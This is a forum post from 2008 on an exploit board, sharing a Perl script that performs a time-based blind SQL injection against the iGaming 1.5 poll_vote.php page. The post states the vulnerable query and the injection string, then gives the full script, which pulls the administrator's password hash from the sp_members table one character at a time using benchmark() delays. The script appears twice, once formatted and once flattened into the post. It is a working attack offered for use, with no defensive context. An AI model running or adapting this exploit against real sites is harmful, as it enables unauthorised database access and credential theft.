iGaming 1.5 Remote Blind SQL Injection Exploit

**Armageddon** · 08-01-2008

#!/usr/bin/perl
#================================================= ================================================== ========================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | #
# \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| #
#================================================= ================================================== ========================#
# iGaming 1.5 Remote Blind Sql Injection Exploit #
#================================================= ================================================== ========================#
# Author : Cod3rZ #
#================================================= ================================================== ========================#
# Site : http://cod3rz.helloweb.eu #
# Site : http://devilsnight.altervista.org #
#================================================= ================================================== ========================#
# $result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'"); #
#================================================= ================================================== ========================#
# ?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,1,1))=48),benchmark(200 000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/* #
#================================================= ================================================== ========================#
# Thanks to: the man of the greetz, DreamMark #
#================================================= ================================================== ========================#
# Exploit based: Rossi46GO #
# Modded by: Cod3rZ #
#================================================= ================================================== ========================#
# Usage: perl ig.pl site #
#================================================= ================================================== ========================#
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;

$ua = LWP::UserAgent->new;

$site = $ARGV[0];

if(!$site) { &usage; }
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2);

sub usage {
print " Usage: perl ig.pl site \n";
print " Ex.: perl ig.pl http://127.0.0.1 \n";
}
sub request {
$var = $_[0];
$start = Time::HiRes::time();
$response = $ua->request(GET $var,s => $var);
$response->is_success() || print("$!\n");
$end = Time::HiRes::time();
$time = $end - $start;
return $time
}
sub refresh{
system("cls");
print " -------------------------------------------------\n";
print " iGaming 1.5 Remote Blind Sql Injection Exploit \n";
print " Powered by Cod3rZ \n";
print " http://cod3rz.helloweb.eu \n";
print " -------------------------------------------------\n";
print " Please Wait.. \n";
print " Hash : " . $_[3] . " \n";
print " -------------------------------------------------\n";
}
for ($i = 1; $i < 33; $i++)
{
for ($j = 0; $j < 16; $j++)
{
$var = $site."/poll_vote.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/*";
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
if($time > 8)
{
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
$hash .= chr($array[$j]);
refresh($host,$timedefault,$j,$hash,$time,$i);
$j=200;
}

}
if($i == 1 && !$hash)
{
print " Failed \n";
print " -------------------------------------------------\n";
die();
}
if($i == 32) {
print " Exploit Terminated \n";
print " -------------------------------------------------\n ";
system('pause');
}}

08-01-2008	#1 (permalink)
Armageddon Studentz Join Date: Jun 2006 Location: On port u forgot to secure! Age: 18 Posts: 6,042 Thanks: 54 Thanked 146 Times in 114 Posts Rep Power: 241 Awards Showcase Total Awards: 6	iGaming 1.5 Remote Blind SQL Injection Exploit #!/usr/bin/perl #================================================= ================================================== ========================# # _ ____ _ _ _ _ # # __ ___ __\| \|__ /_ _ ___ \| \|_ ___\| \| \|_____ __ _____\| \|__ ___ _ _ # # / _/ _ \/ _` \|\|_ \ '_\|_ / _ \| ' \/ -_) \| / _ \ V V / -_) '_ \ _ / -_) \|\| \| # # \__\___/\__,_\|___/_\| /__\| (_) \|_\|\|_\___\|_\|_\___/\_/\_/\___\|_.__/ (_) \___\|\_,_\| # #================================================= ================================================== ========================# # iGaming 1.5 Remote Blind Sql Injection Exploit # #================================================= ================================================== ========================# # Author : Cod3rZ # #================================================= ================================================== ========================# # Site : http://cod3rz.helloweb.eu # # Site : http://devilsnight.altervista.org # #================================================= ================================================== ========================# # $result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'"); # #================================================= ================================================== ========================# # ?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,1,1))=48),benchmark(200 000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/* # #================================================= ================================================== ========================# # Thanks to: the man of the greetz, DreamMark # #================================================= ================================================== ========================# # Exploit based: Rossi46GO # # Modded by: Cod3rZ # #================================================= ================================================== ========================# # Usage: perl ig.pl site # #================================================= ================================================== ========================# use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; $ua = LWP::UserAgent->new; $site = $ARGV[0]; if(!$site) { &usage; } @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2); sub usage { print " Usage: perl ig.pl site \n"; print " Ex.: perl ig.pl http://127.0.0.1 \n"; } sub request { $var = $_[0]; $start = Time::HiRes::time(); $response = $ua->request(GET $var,s => $var); $response->is_success() \|\| print("$!\n"); $end = Time::HiRes::time(); $time = $end - $start; return $time } sub refresh{ system("cls"); print " -------------------------------------------------\n"; print " iGaming 1.5 Remote Blind Sql Injection Exploit \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; print " Please Wait.. \n"; print " Hash : " . $_[3] . " \n"; print " -------------------------------------------------\n"; } for ($i = 1; $i < 33; $i++) { for ($j = 0; $j < 16; $j++) { $var = $site."/poll_vote.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/"; $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); if($time > 8) { $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); $hash .= chr($array[$j]); refresh($host,$timedefault,$j,$hash,$time,$i); $j=200; } } if($i == 1 && !$hash) { print " Failed \n"; print " -------------------------------------------------\n"; die(); } if($i == 32) { print " Exploit Terminated \n"; print " -------------------------------------------------\n "; system('pause'); }} __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.*

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-06-2008 12:15 PM
ODFaq 2.1.0 Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-04-2008 01:40 PM
OneCMS 2.5 Remote Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-02-2008 12:22 PM
HRS Multi Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-01-2008 03:04 PM
MojoClassifieds 2.0 Remote Blind SQL Injection Exploit	saswata	Exploit Codes	0	07-22-2008 03:51 AM

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)